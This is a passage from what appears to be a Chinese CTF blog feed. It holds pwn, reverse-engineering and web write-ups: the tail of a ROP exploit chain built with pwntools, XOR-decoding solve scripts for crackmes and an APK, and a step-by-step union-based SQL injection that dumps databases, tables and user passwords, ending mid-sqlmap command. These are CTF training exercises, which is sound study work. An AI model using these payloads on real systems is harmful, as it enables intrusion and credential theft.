class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000401243</span>) <span class="hljs-comment"># syscall</span><br><br>pl.sendline(p)<br><br>pl.interactive()<br></code></pre></td></tr></table></figure><h3 id="WEEK1-babystack"><a href="#WEEK1-babystack" class="headerlink" title="[WEEK1]babystack"></a>[WEEK1]babystack</h3>]]></content>
<summary type="html"><h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="WEEK1-ez-asm"><a href="#WEEK1-ez-asm" class="headerlink" title="[WEEK1]ez_asm"></a>[WEEK1]ez_asm</h3><p>简单的asm代码,直接对照的逻辑逆向即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python">flag = <span class="hljs-string">&quot;nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y&quot;</span> <br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(flag)):<br> <br> c = flag[i] <br> c = <span class="hljs-built_in">ord</span>(c)+<span class="hljs-number">0xA</span><br> flag = flag[:i] + <span class="hljs-built_in">chr</span>(c) + flag[i+<span class="hljs-number">1</span>:]<br><br> c = flag[i]<br> c = <span class="hljs-built_in">ord</span>(c)^<span class="hljs-number">0x1E</span><br> flag = flag[:i] + <span class="hljs-built_in">chr</span>(c) + flag[i+<span class="hljs-number">1</span>:]<br><br><br><br><span class="hljs-built_in">print</span>(flag)<br></code></pre></td></tr></table></figure></summary>
</entry>
<entry>
<title>re做题记录</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/09/23/re%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/09/23/re%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/</id>
<published>2023-09-23T07:26:20.000Z</published>
<updated>2023-12-18T05:33:25.767Z</updated>
<content type="html"><![CDATA[<h1 id="花指令"><a href="#花指令" class="headerlink" title="花指令"></a>花指令</h1><p><a href="https://blog.csdn.net/Captain_RB/article/details/123858864">花指令总结_Captain_RB的博客-CSDN博客</a></p><h2 id="NSSRound-3-Team-jump-by-jump"><a href="#NSSRound-3-Team-jump-by-jump" class="headerlink" title="[NSSRound#3 Team]jump_by_jump"></a>[NSSRound#3 Team]jump_by_jump</h2><p>[<a href="https://www.nssctf.cn/problem/2313">NSSRound#3 Team]jump_by_jump | NSSCTF</a></p><p>为什么记录这个题目时因为他有花指令,是最简单的花指令</p><p>首先我们使用ida打开,我们可以看到他的主函数里调用了flag函数,但是不显示,我们切换视图发现是有花指令导致他无法编译</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.l5jcce610eo.webp"></p><p>我们看到他的特征就想到了多字节指令,我们在41188C(call或者jmp等等跳转函数)处,摁D将其转换成数据,将E8 nop 掉</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.6qkaosh9hjk0.webp"></p><p>同时我们发现有很多变成了黄色的代码,我们一路对这些黄色的代码摁c将其转换成代码,最后我们可以选中全部的代码,摁d转换成数据,摁c转换成代码,最后摁p再编译成函数,就去掉了这类最简单的花指令,在函数内我们就发现了flag</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.3x3dpjarkq60.webp"></p><span id="more"></span> <h2 id="HNCTF-2022-WEEK2-e-sy-flower"><a href="#HNCTF-2022-WEEK2-e-sy-flower" class="headerlink" title="[HNCTF 2022 WEEK2]e@sy_flower"></a>[HNCTF 2022 WEEK2]e@sy_flower</h2><p>第二个简单的去花题目</p><p>找到主函数后发现有花的地方</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.44rklresz740.webp"></p><p>我们在这里找到了花指令的地方,我们直接右击选择patching->change byte</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.50qing3en4o0.webp"></p><p>我们把E9->90 ,把E9nop掉,然后在main上p一下编译函数就可以了</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.4saybtma0gs0.webp"></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> __cdecl __noreturn <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>{<br> <span class="hljs-type">signed</span> <span class="hljs-type">int</span> v3; <span class="hljs-comment">// kr00_4</span><br> <span class="hljs-type">int</span> i; <span class="hljs-comment">// edx</span><br> <span class="hljs-type">char</span> v5; <span class="hljs-comment">// cl</span><br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> j; <span class="hljs-comment">// edx</span><br> <span class="hljs-type">int</span> v7; <span class="hljs-comment">// eax</span><br> <span class="hljs-type">char</span> v8; <span class="hljs-comment">// [esp+0h] [ebp-44h]</span><br> <span class="hljs-type">char</span> v9; <span class="hljs-comment">// [esp+0h] [ebp-44h]</span><br> <span class="hljs-type">char</span> Arglist[<span class="hljs-number">48</span>]; <span class="hljs-comment">// [esp+10h] [ebp-34h] BYREF</span><br><br> sub_401020(<span class="hljs-string">"please input flag\n"</span>, v8);<br> sub_401050(<span class="hljs-string">"%s"</span>, (<span class="hljs-type">char</span>)Arglist);<br> v3 = <span class="hljs-built_in">strlen</span>(Arglist);<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i < v3 / <span class="hljs-number">2</span>; ++i )<br> {<br> v5 = Arglist[<span class="hljs-number">2</span> * i];<br> Arglist[<span class="hljs-number">2</span> * i] = Arglist[<span class="hljs-number">2</span> * i + <span class="hljs-number">1</span>];<br> Arglist[<span class="hljs-number">2</span> * i + <span class="hljs-number">1</span>] = v5;<br> }<br> <span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>; j < <span class="hljs-built_in">strlen</span>(Arglist); ++j )<br> Arglist[j] ^= <span class="hljs-number">0x30</span>u;<br> v7 = <span class="hljs-built_in">strcmp</span>(Arglist, <span class="hljs-string">"c~scvdzKCEoDEZ[^roDICUMC"</span>);<br> <span class="hljs-keyword">if</span> ( v7 )<br> v7 = v7 < <span class="hljs-number">0</span> ? <span class="hljs-number">-1</span> : <span class="hljs-number">1</span>;<br> <span class="hljs-keyword">if</span> ( !v7 )<br> {<br> sub_401020(<span class="hljs-string">"yes"</span>, v9);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br> sub_401020(<span class="hljs-string">"error"</span>, v9);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br>}<br></code></pre></td></tr></table></figure><p>我们分析代码就可以知道,我们已知了加密后的代码,先异或回数据,然后根据前面的替换</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.3qj9ibdwap80.webp"></p><p>然后根据上面解出来的数据再写代码进行替换位置</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python">a=<span class="hljs-string">'SNCSFTJ{su_tujknB_tyse}s'</span><br>secret=<span class="hljs-built_in">list</span>(a)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">12</span>):<br> deme=secret[<span class="hljs-number">2</span>*i+<span class="hljs-number">1</span>]<br> secret[<span class="hljs-number">2</span>*i+<span class="hljs-number">1</span>] = secret[<span class="hljs-number">2</span>*i]<br> secret[<span class="hljs-number">2</span>*i]=deme<br><br>result=<span class="hljs-string">''</span>.join(secret)<br><br><span class="hljs-built_in">print</span>(result,end=<span class="hljs-string">''</span>)<br><br><span class="hljs-comment"># NSSCTF{Just_junk_Bytess}</span><br></code></pre></td></tr></table></figure><h2 id="SWPUCTF-2021-新生赛-easyapp"><a href="#SWPUCTF-2021-新生赛-easyapp" class="headerlink" title="[SWPUCTF 2021 新生赛]easyapp"></a>[SWPUCTF 2021 新生赛]easyapp</h2><p>首先先把附件改成zip后缀进行解压,解压完成后直接使用jadx打开直接找到主函数进行分析</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.5lfec6bnq680.webp"></p><p>我们可以看到这段是主要的函数</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-comment">/* synthetic */</span> <span class="hljs-keyword">void</span> lambda$onCreate$<span class="hljs-number">0</span>$MainActivity(<span class="hljs-keyword">final</span> EditText editText, View v) {<br> System.out.println(encoder.encode(editText.getText().toString()));<br> <span class="hljs-keyword">if</span> (encoder.encode(editText.getText().toString()).equals(<span class="hljs-string">"棿棢棢棲棥棷棊棐棁棚棨棨棵棢棌"</span>)) {<br> Toast.makeText(<span class="hljs-built_in">this</span>, <span class="hljs-string">"YES"</span>, <span class="hljs-number">0</span>).show();<br> } <span class="hljs-keyword">else</span> {<br> Toast.makeText(<span class="hljs-built_in">this</span>, <span class="hljs-string">"NO"</span>, <span class="hljs-number">0</span>).show();<br> }<br><br></code></pre></td></tr></table></figure><p>前面引进了两个函数,我们挨个查看一下</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1cftb7q0szxc.webp"></p><p>我们可以看到第一个加密函数,使用了key为123456789,然后和输入的内容进行异或</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.example.ilililililil;<br><br><span class="hljs-comment">/* loaded from: classes.dex */</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Encoder</span> {<br> <span class="hljs-keyword">private</span> <span class="hljs-type">int</span> <span class="hljs-variable">key</span> <span class="hljs-operator">=</span> <span class="hljs-number">123456789</span>;<br><br> <span class="hljs-keyword">public</span> String <span class="hljs-title function_">encode</span><span class="hljs-params">(String str)</span> {<br> <span class="hljs-type">StringBuilder</span> <span class="hljs-variable">sb</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">StringBuilder</span>();<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">char</span> c : str.toCharArray()) {<br> sb.append((<span class="hljs-type">char</span>) (c ^ <span class="hljs-built_in">this</span>.key));<br> }<br> <span class="hljs-keyword">return</span> sb.toString();<br> }<br>}<br></code></pre></td></tr></table></figure><p>我们看一下下一个函数。这里就是一个坑,他把第一个函数中的key值改成了987654321,所以后面异或的key为987654321</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.example.ilililililil;<br><br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><br><span class="hljs-comment">/* loaded from: classes.dex */</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">MainActlvity</span> {<br> <span class="hljs-keyword">public</span> <span class="hljs-title function_">MainActlvity</span><span class="hljs-params">()</span> {<br> <span class="hljs-keyword">try</span> {<br> <span class="hljs-type">Field</span> <span class="hljs-variable">declaredField</span> <span class="hljs-operator">=</span> Encoder.class.getDeclaredField(<span class="hljs-string">"key"</span>);<br> declaredField.setAccessible(<span class="hljs-literal">true</span>);<br> declaredField.set(MainActivity.encoder, <span class="hljs-number">987654321</span>);<br> } <span class="hljs-keyword">catch</span> (IllegalAccessException | NoSuchFieldException e) {<br> e.printStackTrace();<br> }<br> }<br>}<br></code></pre></td></tr></table></figure><p>到现在我们已经知道了异或的key以及密文,所以我们就可以直接写脚本解题目了</p><p>当然注意一个很关键的地方因为他的apk使用的unicode编码,但我们ascii码的表示范围是0x0-0xFF,所以到最后我们需要异或一个255或者0xff表示范围</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python">code=<span class="hljs-string">'棿棢棢棲棥棷棊棐棁棚棨棨棵棢棌'</span><br>key = <span class="hljs-number">987654321</span><br>flag=<span class="hljs-string">""</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> code:<br> flag+=<span class="hljs-built_in">chr</span>((<span class="hljs-built_in">ord</span>(i)^key)%<span class="hljs-number">128</span>) <span class="hljs-comment">#确定在0~128</span><br><span class="hljs-built_in">print</span>(flag)<br><br><span class="hljs-comment"># NSSCTF{apkYYDS}</span><br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="花指令"><a href="#花指令" class="headerlink" title="花指令"></a>花指令</h1><p><a href="https://blog.csdn.net/Captain_RB/article/details/123858864">花指令总结_Captain_RB的博客-CSDN博客</a></p>
<h2 id="NSSRound-3-Team-jump-by-jump"><a href="#NSSRound-3-Team-jump-by-jump" class="headerlink" title="[NSSRound#3 Team]jump_by_jump"></a>[NSSRound#3 Team]jump_by_jump</h2><p>[<a href="https://www.nssctf.cn/problem/2313">NSSRound#3 Team]jump_by_jump | NSSCTF</a></p>
<p>为什么记录这个题目时因为他有花指令,是最简单的花指令</p>
<p>首先我们使用ida打开,我们可以看到他的主函数里调用了flag函数,但是不显示,我们切换视图发现是有花指令导致他无法编译</p>
<p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.l5jcce610eo.webp"></p>
<p>我们看到他的特征就想到了多字节指令,我们在41188C(call或者jmp等等跳转函数)处,摁D将其转换成数据,将E8 nop 掉</p>
<p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.6qkaosh9hjk0.webp"></p>
<p>同时我们发现有很多变成了黄色的代码,我们一路对这些黄色的代码摁c将其转换成代码,最后我们可以选中全部的代码,摁d转换成数据,摁c转换成代码,最后摁p再编译成函数,就去掉了这类最简单的花指令,在函数内我们就发现了flag</p>
<p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.3x3dpjarkq60.webp"></p></summary>
<category term="ctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/ctf/"/>
<category term="re" scheme="https://shenshuoyaoyouguangha.github.io/tags/re/"/>
</entry>
<entry>
<title>web入门记录</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/09/21/web%E5%85%A5%E9%97%A8%E8%AE%B0%E5%BD%95/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/09/21/web%E5%85%A5%E9%97%A8%E8%AE%B0%E5%BD%95/</id>
<published>2023-09-21T05:45:27.000Z</published>
<updated>2023-12-18T05:33:32.691Z</updated>
<content type="html"><![CDATA[<p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/202308172151534.jpg"></p><span id="more"></span> <h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><p><a href="https://blog.csdn.net/A951860555/article/details/116484328">SQL注入的一般过程_sql注入过程___lifanxin的博客-CSDN博客</a></p><p><a href="">浅谈SQL注入中的-1‘ union select 1,2,3#_娄不夜的博客-CSDN博客</a></p><p>SQL中的select语句,select语句是SQL中的查询语句,用于从数据库中查询数据,并且返回给用户。<br>它的简单用法是这样的:<strong>select 字段名1,字段名2…字段名n from</strong> 表名当然,你也可以同时指定数据库名及表名,具体用法是用一个点号连接数据库名和表名,例子:select 字段名1,字段名2…字段名n from 数据库名.表名</p><p>联合查询:<br> 格式:<strong>select 字段名1,字段名2…字段名n from 表名1 union select 字段名1,字段名2…字段名n from 表名2</strong><br> 作用:联合查询用于合并两个或多个 SELECT 语句的结果集<br> 注意:</p><pre><code class="hljs"> 1. 每个 SELECT 语句必须拥有相同数量的列 2. 列必须拥有相似的数据类型(相似的意思是:有些数据类型间可以互相转化,比如数字字符串和数字。这就叫相似,相似就行,不是必须一模一样) 3. 每个 SELECT 语句中的列的顺序必须相同</code></pre><h2 id="手注:"><a href="#手注:" class="headerlink" title="手注:"></a>手注:</h2><p>记录一种做题方法</p><p>题目来源 Litctf sql注入</p><p>1.先判断显示位,payload</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">-<span class="hljs-number">1</span>)))))) union select <span class="hljs-number">1</span>,<span class="hljs-number">2</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>2.爆库:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">1)))))) and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata#<br></code></pre></td></tr></table></figure><p>1=2的目的是使得条件为假</p><p>3.得到库名</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">information_schema,mysql,ctftraining,performance_schema,test,ctf<br></code></pre></td></tr></table></figure><p>4.爆表:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(table_name)<span class="hljs-keyword">from</span> information_schema.tables where table_schema=<span class="hljs-string">"ctf"</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>5.得到表名:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">users<br></code></pre></td></tr></table></figure><p>6.爆列:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(column_name)<span class="hljs-keyword">from</span> information_schema.columns where table_name=<span class="hljs-string">"users"</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>7.得到列名:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password<br></code></pre></td></tr></table></figure><p>8.获取值:</p><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,group_concat(<span class="hljs-keyword">password</span>) <span class="hljs-keyword">from</span> ctf.users#<br></code></pre></td></tr></table></figure><p>9.获得彩蛋(难蚌):</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">OHHHHHHH,F1rst_to_Th3_eggggggggg!} <br></code></pre></td></tr></table></figure><p>flag同理,去爆ctftraining即可</p><p>10.重新爆表:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(table_name)<span class="hljs-keyword">from</span> information_schema.tables where table_schema=<span class="hljs-string">"ctftraining"</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>11.得到表明:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">flag,news,users<br></code></pre></td></tr></table></figure><p>12.重新爆列:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(column_name)<span class="hljs-keyword">from</span> information_schema.columns where table_name=<span class="hljs-string">"flag"</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>13.获得列名:</p><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">flag</span><br></code></pre></td></tr></table></figure><p>14.重新获取值:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(flag) <span class="hljs-keyword">from</span> ctftraining.flag<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><h2 id="Sqlmap"><a href="#Sqlmap" class="headerlink" title="Sqlmap"></a>Sqlmap</h2><p>查询是否可以找到数据库</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-keyword">python3</span> sqlmap.<span class="hljs-keyword">py</span> -r <span 